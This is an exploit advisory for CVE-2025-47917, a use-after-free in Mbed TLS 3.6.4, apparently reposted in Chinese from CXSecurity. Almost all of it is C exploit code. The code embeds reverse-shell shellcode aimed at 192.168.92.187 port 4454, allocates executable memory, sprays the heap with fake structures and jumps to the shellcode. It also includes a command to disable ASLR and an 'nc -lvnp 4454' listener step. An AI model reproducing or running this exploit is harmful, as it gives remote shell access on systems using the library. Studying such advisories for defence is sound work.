Mbed TLS 3.6.4 释放后重用漏洞技术分析与利用代码详解

Tue, 30 Dec 2025 15:38:26 +0800
Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com

Bugtraq ID： 未提供 发布日期： 2025年12月9日 提交者： Byte Reaper 风险等级： 高 本地利用： 否 远程利用： 是 CVE编号： CVE-2025-47917 CWE编号： N/A
/*
 * 漏洞标题：Mbed TLS 3.6.4 - Use-After-Free
 * Google搜索关键词：N/A
 * 发现日期：2025-08-29
 * 漏洞作者：Byte Reaper
 * 供应商主页：https://github.com/Mbed-TLS/mbedtls
 * 软件链接：https://github.com/Mbed-TLS/mbedtls
 * 受影响版本：≤ 3.6.4
 * 测试环境：Kali Linux
 * CVE编号：CVE-2025-47917
*/

#include<stdio.h>
#include<string.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>
#include "mbedtls/asn1.h"
#include <mbedtls/x509.h>
#include <mbedtls/x509_crt.h>
#include <mbedtls/oid.h>
#include <malloc.h>
#define _GNU_SOURCE

// 定义shellcode容器结构
typedef struct
{
    unsigned char *pointer;
    size_t pointerLen;
} shell;

// 伪造的命名数据结构，用于模拟堆布局
typedef struct fake_named_data
{
    struct fake_named_data *next;
    mbedtls_asn1_buf oid;
    mbedtls_asn1_buf val;
} fake_named_data;

// 系统退出函数（汇编实现）
void eS()
{
    __asm__ volatile
    (
        "xor %%rdi, %%rdi\n\t"
        "mov $0x3C, %%rax\n\t"
        "syscall\n\t"
        :
        :
        :"rax", "rdi"
    );
}

// 检查ASLR（地址空间布局随机化）状态
void checkAslr()
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (!f)
    {
        perror("\e[1;31m[-] 打开文件错误！");
        eS();
    }

    int val;
    if (fscanf(f,
        "%d",
        &val) != 1)
    {
        printf("\e[1;31m[-] 读取ASLR状态失败。\e[0m\n");
        fclose(f);
        eS();
    }

    fclose(f);

    if (val != 0)
    {
        printf("\e[1;31m[-] ASLR已启用（值=%d）。这可能影响利用的稳定性。\e[0m\n", val);
        printf("[\e[1;31m-] 请临时禁用ASLR：echo 0 | sudo tee /proc/sys/kernel/randomize_va_space\n");
        printf("\e[1;31m[-] 为避免崩溃，现在退出。\e[0m\n");
        eS();
    }

    printf("\e[1;36m[+] ASLR已禁用（值=0）。环境检查通过。\e[0m\n");
}

// 生成并注入shellcode
shell inject()
{
    // 目标IP：192.168.92.187
    // 目标端口：4454
    unsigned char shellcode[] =
    {
        0x48, 0x31, 0xd2, 0xb8, 0x29, 0x00, 0x00, 0x00, 0xbe, 0x01, 0x00, 0x00,
        0x00, 0xbf, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0x49,
        0x89, 0xc4, 0x48, 0x83, 0xec, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0xbd, 0x5c,
        0xa8, 0xc0, 0x66, 0xc7, 0x44, 0x24, 0x0a, 0x11, 0xc1, 0x66, 0xc7, 0x44,
        0x24, 0x08, 0x02, 0x00, 0x48, 0x89, 0xe6, 0xba, 0x10, 0x00, 0x00, 0x00,
        0xb8, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x4c, 0x89, 0xe7, 0xbe, 0x02,
        0x00, 0x00, 0x00, 0xb8, 0x21, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xff,
        0xce, 0x79, 0xf4, 0x48, 0x31, 0xd2, 0x48, 0xb8, 0x62, 0x2f, 0x73, 0x62,
        0x61, 0x73, 0x68, 0x00, 0x50, 0x48, 0xb8, 0x2f, 0x75, 0x73, 0x72, 0x2f,
        0x62, 0x69, 0x6e, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x57, 0x48, 0x89, 0xe6,
        0xb8, 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05
    };
    size_t shellcodeLen = sizeof(shellcode);
    shell a =
    {
        shellcode,
        shellcodeLen
    };

    // 分配可执行内存页
    void *page = mmap(NULL, a.pointerLen,
                      PROT_READ|PROT_WRITE|PROT_EXEC,
                      MAP_ANON|MAP_PRIVATE, -1, 0);
    memcpy(page, a.pointer, a.pointerLen);

    a.pointer = page;
    return a;
}

// 堆喷技术：填充大量堆块以控制内存布局
void paddingChunk(void *fakeP, size_t len)
{
    for (int i = 0; i < 10000; i++)
    {
        void *p = malloc(len);
        size_t usable = malloc_usable_size(p);
        memcpy(p, fakeP, len);
        memset((char*)p + len, 0, usable - len);
    }
}

// 执行shellcode的头部指针检查函数
void pointerHead(mbedtls_asn1_named_data *head)
{
    if (head->val.p == NULL)
    {
        printf("\e[1;91m[-] Shellcode指针为空！\e[0m\n");
        eS();
    }
    printf("\e[1;36m[*] 跳转到shellcode地址：%p\e[0m\n", head->val.p);
    void (*u)() = (void(*)()) head->val.p;
    u(); // 执行shellcode
}

// 主漏洞利用函数
void tls()
{
    mbedtls_asn1_named_data *head = NULL;
    printf("\e[1;34m[+] 成功创建头部指针！\e[0m\n");
    printf("\e[1;35m[*] 第一次调用前的head指针：%p\e[0m\n", head);
    
    // 第一次调用，触发内部内存分配
    int value = mbedtls_x509_string_to_names(&head, "CN=AAAA");
    
    // 生成shellcode
    shell a = inject();
    void *exec_mem = a.pointer;
    
    // 构造伪造的数据结构
    fake_named_data data =
    {
        .next = NULL,
        .oid  =
        {
            .p = (unsigned char*) MBEDTLS_OID_AT_CN,
            .len = sizeof(MBEDTLS_OID_AT_CN) - 1 
        },
        .val  =
        {
            .p = a.pointer,      // 指向shellcode
            .len = a.pointerLen   // shellcode长度
        }
    };
    printf("\e[1;35m[*] 第一次调用后的head指针：%p (返回值=%d)\e[0m\n", head, value);

    // 进行堆喷，控制内存布局
    paddingChunk(&data, sizeof(mbedtls_asn1_named_data));
    printf("\e[1;34m[+] 正在进行堆喷射...\e[0m\n");

    usleep(500000);
    
    // 检查第一次调用是否成功
    if (value == MBEDTLS_ERR_X509_INVALID_NAME)
    {
        printf("\e[1;31m[-] 无效名称（Mbed TLS名称格式）！\e[0m\n");
        printf("[\e[1;31m-] 返回值 => (MBEDTLS_ERR_X509_INVALID_NAME)\e[0m\n");
        printf("\e[1;31m[-] 正在退出（系统调用退出）...\e[0m\n");
        eS();
    }
    
    printf("\e[1;35m[*] 第二次调用前的head指针：%p\e[0m\n", head);
    
    // 第二次调用，触发Use-After-Free漏洞
    int value2 = mbedtls_x509_string_to_names(&head, "CN=AAAA,CN=BBBB");
    printf("\e[1;35m[*] 第二次调用后的head指针：%p (返回值=%d)\e[0m\n", head, value2);
    
    printf("\e[1;34m[+] 成功创建字符串名称。\e[0m\n");
    
    // 尝试通过已被释放但重新占用的指针执行shellcode
    pointerHead(head);
    
    printf("\e[1;34m[+] 跳转到Shellcode指针...\e[0m\n");
    printf("\e[1;34m[+] Shellcode指针地址：%p\e[0m\n", a.pointer);
    printf("\e[1;34m[+] Shellcode注入成功！\e[0m\n");
    printf("\e[1;34m[+] Shellcode长度：%zu\e[0m\n", a.pointerLen);
    printf("\e[1;33m[+] 请检查反向Shell连接（nc -lvnp 4454）\e[0m\n");
    printf("\e[1;34m[+] 成功释放头部指针！\e[0m\n");
}

// 主函数
int main()
{
    // 显示利用程序标题
    printf("\e[0;95m+-------------------------------------------------+\e[0m\n");
    printf("\e[0;95m|\e[0m 	    \e[1;37mByte Reaper\e[0m 	                  \e[0;95m|\e[0m\n");
    printf("\e[0;95m|\e[0m 	    \e[1;33m漏洞利用：CVE-2025-47917\e[0m               \e[0;95m|\e[0m\n");
    printf("\e[0;95m|\e[0m 	    \e[1;31m漏洞类型：释放后重用\e[0m                    \e[0;95m|\e[0m\n");
    printf("\e[0;95m+-------------------------------------------------+\e[0m\n");
    
    // 检查root权限
    if (getuid() != 0)
    {
        printf("\e[1;31m[-] 请以root权限运行利用程序（sudo ./exploit）\n");
        eS();
    }
    
    // 检查ASLR状态
    checkAslr();
    
    // 执行漏洞利用
    tls();
    
    return 0;
}
Mbed TLS on 办公AI智能小助手

Mbed TLS 3.6.4 释放后重用漏洞技术分析与利用代码详解

Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com
